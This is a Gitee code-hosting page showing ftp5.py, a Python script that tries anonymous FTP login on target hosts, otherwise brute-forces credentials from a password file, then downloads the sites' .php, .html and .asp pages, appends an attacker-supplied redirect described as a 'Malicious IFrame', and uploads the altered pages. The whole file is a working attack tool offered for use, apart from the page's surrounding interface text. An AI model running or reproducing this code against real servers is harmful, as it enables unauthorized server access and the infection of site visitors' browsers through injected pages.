加入 Gitee
与超过 1200万 开发者一起发现、参与优秀开源项目,私有仓库也完全免费 :)
免费加入
文件
该仓库未声明开源许可证文件(LICENSE),使用请关注具体项目描述及其代码上游依赖。
克隆/下载
ftp5.py 3.42 KB
一键复制 编辑 原始数据 按行查看 历史
D60 提交于 2016-12-05 18:07 . add source code
# coding=UTF-8
import ftplib
import optparse
import time
def anonLogin(hostname):
try:
ftp = ftplib.FTP(hostname)
ftp.login('anonymous','me@your.com')
print('\n[*] ' + str(hostname) + ' FTP Anonymous Logon Succeeded!')
ftp.quit()
return True
except Exception as e:
print('\n[-] ' + str(hostname) + ' FTP Anonymous Logon Failed!')
return False
def bruteLogin(hostname, passwdFile):
pF = open(passwdFile, 'r')
for line in pF.readlines():
userName = line.split(':')[0]
passWord = line.split(':')[1].strip('\r').strip('\n')
try:
ftp = ftplib.FTP(hostname)
ftp.login(userName,passWord)
print('\n[*] ' + str(hostname) + ' FTP Anonymous Logon Succeeded:' + userName +'/' + passWord)
ftp.quit()
return (userName,passWord)
except Exception as e:
pass
print('\n[-] Could not brute force FTP credentials.')
return (None, None)
def returnDefault(ftp):
try:
dirList = ftp.nlst()
except:
dirList = []
print('[-] Could not list directory contents.')
print('[-] Skipping To Next Target.')
return
retList = []
for fileName in dirList:
fn = fileName.lower()
if '.php' in fn or '.html' in fn or '.asp' in fn:
print('[+] Found default page:' + fileName)
retList.append(fileName)
return retList
def injectPage(ftp, page, redirect):
f = open(page + '.tmp', 'w')
ftp.retrlines('RETR ' + page, f.write)
print('[+] Downloaded Page:'+ page)
f.write(redirect)
f.close()
print('[+] Injected Malicious IFrame on: ' + page)
ftp.storlines('STOR ' + page, open(page + '.tmp'))
print('[+] Uploaded Injected Page: ' + page)
def attack(username, password, tgtHost, redirect):
ftp = ftplib.FTP(tgtHost)
ftp.login(username, password)
defPages = returnDefault(ftp)
for defPage in defPages:
injectPage(ftp, defPage, redirect)
def main():
parser = optparse.OptionParser('usage%prog -H <target host[s]> -r <redirect page> [-f <userpass file>]')
parser.add_option('-H', dest='tgtHosts', type='string', help='specify target host')
parser.add_option('-f', dest='passwdFile', type='string', help='specify user/password file')
parser.add_option('-r', dest='redirect', type='string', help='specify a redirection page')
(options, args) = parser.parse_args()
tgtHosts = str(options.tgtHosts).split(', ')
passwdFile = options.passwdFile
redirect = options.redirect
if tgtHosts == None or redirect == None:
print(parser.usage)
exit(0)
for tgtHost in tgtHosts:
username = None
password = None
attacked = False
if anonLogin(tgtHost) == True:
username = 'anonymous'
password = 'me@your.com'
print('[+] Using Anonymous Creds to attack')
try:
attack(username, password, tgtHost, redirect)
attacked = True
except:
print('[-] Using Anonymous attack Failed!')
pass
if passwdFile != None and not attacked:
(username, password) = bruteLogin(tgtHost, passwdFile)
if password != None:
print('[+] Using Creds: ' + username + '/' + password + ' to attack')
attack(username, password, tgtHost, redirect)
if __name__ == '__main__':
main()
Loading...
马建仓 AI 助手
尝试更多
代码解读
代码找茬
代码优化